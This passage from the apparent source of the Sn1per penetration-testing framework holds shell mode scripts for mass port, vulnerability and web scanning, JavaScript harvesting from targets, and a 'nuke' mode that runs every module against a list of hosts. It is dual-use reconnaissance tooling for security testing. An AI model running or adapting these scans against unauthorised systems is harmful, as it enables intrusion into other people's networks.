$TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 12 | fi 13 | mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null 14 | nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET 15 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null 16 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null 17 | xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null 18 | cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null 19 | if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then 20 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt" 21 | fi 22 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null 23 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null 24 | HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null) 25 | if [[ ${#HOST_UP} -ge 2 ]]; then 26 | echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null 27 | fi 28 | sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null 29 | rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null 30 | for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do 31 | echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt 32 | done 33 | diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null 34 | 35 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null 36 | 37 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null 38 | 39 | if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then 40 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt" 41 | fi 42 | if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then 43 | if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then 44 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 45 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff" 46 | fi 47 | echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 48 | cat $LOOT_DIR/nmap/ports-$TARGET.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 49 | fi 50 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 51 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 52 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 53 | fi 54 | fi -------------------------------------------------------------------------------- /modes/javascript-analysis.sh: -------------------------------------------------------------------------------- 1 | mkdir -p $LOOT_DIR/web/javascript/$TARGET 2> /dev/null 2 | cd $LOOT_DIR/web/javascript/$TARGET 3 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 4 | echo -e "$OKRED DOWNLOADING ALL JAVASCRIPT FILES $RESET" 5 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 6 | egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' 7 | for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done; 8 | for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -i 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done; 9 | for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -iv 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - https://$a" && FILENAME=$(echo "https://$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done; 10 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 11 | echo -e "$OKRED DISPLAYING ALL JAVASCRIPT COMMENTS $RESET" 12 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 13 | cat $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null | egrep "\/\/|\/\*" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-comments.txt 14 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 15 | echo -e "$OKRED DISPLAYING ALL JAVASCRIPT LINKS $RESET" 16 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 17 | cat $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-urls.txt 18 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 19 | echo -e "$OKRED RUNNING LINKFINDER $RESET" 20 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 21 | cd $PLUGINS_DIR/LinkFinder/ 22 | for a in `ls $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null`; do echo "Analyzing - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && python3 linkfinder.py -d -i $a -o cli 2> /dev/null | egrep -v "application\/|SSL error" > $LOOT_DIR/web/javascript-linkfinder-$TARGET-$FILENAME.txt 2> /dev/null; done; 23 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 24 | echo -e "$OKRED DISPLAYING PATH RELATIVE LINKS $RESET" 25 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 26 | cat $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-path-relative.txt 27 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 28 | echo -e "$OKRED DISPLAYING JAVASCRIPT URLS $RESET" 29 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 30 | grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-linkfinder-urls.txt 31 | sort -u $LOOT_DIR/web/javascript-$TARGET-urls.txt $LOOT_DIR/web/javascript-$TARGET-linkfinder-urls.txt 2> /dev/null > $LOOT_DIR/web/javascript-$TARGET-urls-sorted.txt 32 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 33 | echo -e "$OKRED DISPLAYING JAVASCRIPT DOMAINS $RESET" 34 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 35 | grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | cut -d\/ -f3 | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-domains.txt 36 | WEB_JAVASCRIPT_ANALYSIS="0" 37 | -------------------------------------------------------------------------------- /modes/massportscan.sh: -------------------------------------------------------------------------------- 1 | # MASSWEB MODE ##################################################################################################### 2 | if [[ "$MODE" = "massportscan" ]]; then 3 | if [[ -z "$FILE" ]]; then 4 | logo 5 | echo "You need to specify a list of targets (ie. -f ) to scan." 6 | exit 7 | fi 8 | if [[ "$REPORT" = "1" ]]; then 9 | for a in `cat $FILE`; 10 | do 11 | if [[ ! -z "$WORKSPACE" ]]; then 12 | args="$args -w $WORKSPACE" 13 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 14 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 15 | mkdir -p $WORKSPACE_DIR 2> /dev/null 16 | mkdir $WORKSPACE_DIR/domains 2> /dev/null 17 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null 18 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null 19 | mkdir $WORKSPACE_DIR/notes 2> /dev/null 20 | mkdir $WORKSPACE_DIR/reports 2> /dev/null 21 | mkdir $WORKSPACE_DIR/output 2> /dev/null 22 | fi 23 | args="$args -m fullportonly --noreport --noloot" 24 | TARGET="$a" 25 | args="$args -t $TARGET" 26 | echo -e "$OKRED |" 27 | echo -e "$OKRED | |" 28 | echo -e "$OKRED | -/_\-" 29 | echo -e "$OKRED -/_\- ______________(/ . \)______________" 30 | echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" 31 | echo -e "$OKRED <> \___/ <> <>" 32 | echo -e "$OKRED " 33 | echo -e "$OKRED ||" 34 | echo -e "$OKRED <>" 35 | echo -e "$OKRED ||" 36 | echo -e "$OKRED <>" 37 | echo -e "$OKRED ||" 38 | echo -e "$OKRED || BIG" 39 | echo -e "$OKRED _____ __ <> (^)))^ BOOM!" 40 | echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" 41 | echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" 42 | echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" 43 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" 44 | echo -e "$OKRED | ||. | | | ||| |||||" 45 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" 46 | echo -e "$OKRED | ||. | | | ||| |||||" 47 | echo -e "$OKRED __________________________________________________________" 48 | echo -e "$RESET" 49 | if [[ ! -z "$WORKSPACE_DIR" ]]; then 50 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 51 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 52 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 53 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 54 | fi 55 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 56 | else 57 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 58 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 59 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 60 | fi 61 | args="" 62 | done 63 | fi 64 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 65 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 66 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 67 | fi 68 | if [[ "$LOOT" = "1" ]]; then 69 | loot 70 | fi 71 | 72 | exit 73 | fi 74 | -------------------------------------------------------------------------------- /modes/massvulnscan.sh: -------------------------------------------------------------------------------- 1 | # MASSWEB MODE ##################################################################################################### 2 | if [[ "$MODE" = "massvulnscan" ]]; then 3 | if [[ -z "$FILE" ]]; then 4 | logo 5 | echo "You need to specify a list of targets (ie. -f ) to scan." 6 | exit 7 | fi 8 | if [[ "$REPORT" = "1" ]]; then 9 | for a in `cat $FILE`; 10 | do 11 | if [[ ! -z "$WORKSPACE" ]]; then 12 | args="$args -w $WORKSPACE" 13 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 14 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 15 | mkdir -p $WORKSPACE_DIR 2> /dev/null 16 | mkdir $WORKSPACE_DIR/domains 2> /dev/null 17 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null 18 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null 19 | mkdir $WORKSPACE_DIR/notes 2> /dev/null 20 | mkdir $WORKSPACE_DIR/reports 2> /dev/null 21 | mkdir $WORKSPACE_DIR/output 2> /dev/null 22 | fi 23 | args="$args -m vulnscan --noreport --noloot" 24 | TARGET="$a" 25 | args="$args -t $TARGET" 26 | echo -e "$OKRED |" 27 | echo -e "$OKRED | |" 28 | echo -e "$OKRED | -/_\-" 29 | echo -e "$OKRED -/_\- ______________(/ . \)______________" 30 | echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" 31 | echo -e "$OKRED <> \___/ <> <>" 32 | echo -e "$OKRED " 33 | echo -e "$OKRED ||" 34 | echo -e "$OKRED <>" 35 | echo -e "$OKRED ||" 36 | echo -e "$OKRED <>" 37 | echo -e "$OKRED ||" 38 | echo -e "$OKRED || BIG" 39 | echo -e "$OKRED _____ __ <> (^)))^ BOOM!" 40 | echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" 41 | echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" 42 | echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" 43 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" 44 | echo -e "$OKRED | ||. | | | ||| |||||" 45 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" 46 | echo -e "$OKRED | ||. | | | ||| |||||" 47 | echo -e "$OKRED __________________________________________________________" 48 | echo -e "$RESET" 49 | if [[ ! -z "$WORKSPACE_DIR" ]]; then 50 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 51 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 52 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 53 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 54 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 55 | fi 56 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 57 | else 58 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 59 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 60 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 61 | fi 62 | args="" 63 | done 64 | fi 65 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 66 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 67 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 68 | fi 69 | if [[ "$LOOT" = "1" ]]; then 70 | loot 71 | fi 72 | 73 | exit 74 | fi 75 | -------------------------------------------------------------------------------- /modes/massweb.sh: -------------------------------------------------------------------------------- 1 | # MASSWEB MODE ##################################################################################################### 2 | if [[ "$MODE" = "massweb" ]]; then 3 | if [[ -z "$FILE" ]]; then 4 | logo 5 | echo "You need to specify a list of targets (ie. -f ) to scan." 6 | exit 7 | fi 8 | if [[ "$REPORT" = "1" ]]; then 9 | for a in `cat $FILE`; 10 | do 11 | if [[ ! -z "$WORKSPACE" ]]; then 12 | args="$args -w $WORKSPACE" 13 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 14 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 15 | mkdir -p $WORKSPACE_DIR 2> /dev/null 16 | mkdir $WORKSPACE_DIR/domains 2> /dev/null 17 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null 18 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null 19 | mkdir $WORKSPACE_DIR/notes 2> /dev/null 20 | mkdir $WORKSPACE_DIR/reports 2> /dev/null 21 | mkdir $WORKSPACE_DIR/output 2> /dev/null 22 | fi 23 | args="$args -m web --noreport --noloot" 24 | TARGET="$a" 25 | args="$args -t $TARGET" 26 | echo -e "$OKRED |" 27 | echo -e "$OKRED | |" 28 | echo -e "$OKRED | -/_\-" 29 | echo -e "$OKRED -/_\- ______________(/ . \)______________" 30 | echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" 31 | echo -e "$OKRED <> \___/ <> <>" 32 | echo -e "$OKRED " 33 | echo -e "$OKRED ||" 34 | echo -e "$OKRED <>" 35 | echo -e "$OKRED ||" 36 | echo -e "$OKRED <>" 37 | echo -e "$OKRED ||" 38 | echo -e "$OKRED || BIG" 39 | echo -e "$OKRED _____ __ <> (^)))^ BOOM!" 40 | echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" 41 | echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" 42 | echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" 43 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" 44 | echo -e "$OKRED | ||. | | | ||| |||||" 45 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" 46 | echo -e "$OKRED | ||. | | | ||| |||||" 47 | echo -e "$OKRED __________________________________________________________" 48 | echo -e "$RESET" 49 | if [[ ! -z "$WORKSPACE_DIR" ]]; then 50 | #echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 51 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 52 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 53 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 54 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 55 | fi 56 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 57 | else 58 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 59 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 60 | fi 61 | args="" 62 | done 63 | fi 64 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 65 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 66 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 67 | fi 68 | if [[ "$LOOT" = "1" ]]; then 69 | loot 70 | fi 71 | 72 | exit 73 | fi 74 | -------------------------------------------------------------------------------- /modes/masswebscan.sh: -------------------------------------------------------------------------------- 1 | # MASSWEB MODE ##################################################################################################### 2 | if [[ "$MODE" = "masswebscan" ]]; then 3 | if [[ -z "$FILE" ]]; then 4 | logo 5 | echo "You need to specify a list of targets (ie. -f ) to scan." 6 | exit 7 | fi 8 | if [[ "$REPORT" = "1" ]]; then 9 | for a in `cat $FILE`; 10 | do 11 | if [[ ! -z "$WORKSPACE" ]]; then 12 | args="$args -w $WORKSPACE" 13 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 14 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 15 | mkdir -p $WORKSPACE_DIR 2> /dev/null 16 | mkdir $WORKSPACE_DIR/domains 2> /dev/null 17 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null 18 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null 19 | mkdir $WORKSPACE_DIR/notes 2> /dev/null 20 | mkdir $WORKSPACE_DIR/reports 2> /dev/null 21 | mkdir $WORKSPACE_DIR/output 2> /dev/null 22 | mkdir $WORKSPACE_DIR/vulnerabilities/ 2> /dev/null 23 | mkdir $WORKSPACE_DIR/scans/ 2> /dev/null 24 | fi 25 | args="$args -m webscan --noreport --noloot" 26 | TARGET="$a" 27 | args="$args -t $TARGET" 28 | if [[ ! -z "$WORKSPACE_DIR" ]]; then 29 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 30 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 31 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 32 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 33 | fi 34 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 35 | else 36 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 37 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 38 | fi 39 | args="" 40 | done 41 | fi 42 | 43 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 44 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 45 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 46 | fi 47 | 48 | if [[ "$LOOT" = "1" ]]; then 49 | loot 50 | fi 51 | 52 | exit 53 | fi 54 | -------------------------------------------------------------------------------- /modes/nuke.sh: -------------------------------------------------------------------------------- 1 | # NUKE MODE ##################################################################################################### 2 | if [[ "$MODE" = "nuke" ]]; then 3 | if [[ -z "$FILE" ]]; then 4 | logo 5 | echo "You need to specify a list of targets (ie. -f ) to scan." 6 | exit 7 | fi 8 | if [[ "$REPORT" = "1" ]]; then 9 | for a in `cat $FILE`; 10 | do 11 | if [[ ! -z "$WORKSPACE" ]]; then 12 | args="$args -w $WORKSPACE" 13 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 14 | echo -e "$OKBLUE[*] Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 15 | mkdir -p $WORKSPACE_DIR 2> /dev/null 16 | mkdir $WORKSPACE_DIR/domains 2> /dev/null 17 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null 18 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null 19 | mkdir $WORKSPACE_DIR/notes 2> /dev/null 20 | mkdir $WORKSPACE_DIR/reports 2> /dev/null 21 | mkdir $WORKSPACE_DIR/output 2> /dev/null 22 | fi 23 | args="$args --noreport --noloot" 24 | TARGET="$a" 25 | args="$args -t $TARGET -b" 26 | echo -e "$OKRED " 27 | echo -e "$OKRED ____" 28 | echo -e "$OKRED __,-~~/~ \`---." 29 | echo -e "$OKRED _/_,---( , )" 30 | echo -e "$OKRED __ / < / ) \___" 31 | echo -e "$OKRED - ------===;;;'====------------------===;;;===----- - -" 32 | echo -e "$OKRED \/ ~'~'~'~'~'~\~'~)~'/" 33 | echo -e "$OKRED (_ ( \ ( > \)" 34 | echo -e "$OKRED \_( _ < >_>'" 35 | echo -e "$OKRED ~ \`-i' ::>|--\"" 36 | echo -e "$OKRED I;|.|.|" 37 | echo -e "$OKRED <|i::|i|\`." 38 | echo -e "$OKRED (\` ^''\`-' ')" 39 | echo -e "$OKRED --------------------------------------------------------- $RESET" 40 | echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET" 41 | echo -e "$RESET" 42 | if [[ ! -z "$WORKSPACE_DIR" ]]; then 43 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 44 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 45 | else 46 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 47 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 48 | fi 49 | args="" 50 | done 51 | fi 52 | 53 | if [[ "$LOOT" = "1" ]]; then 54 | loot 55 | fi 56 | exit 57 | fi -------------------------------------------------------------------------------- /modes/osint_stage_2.sh: -------------------------------------------------------------------------------- 1 | if 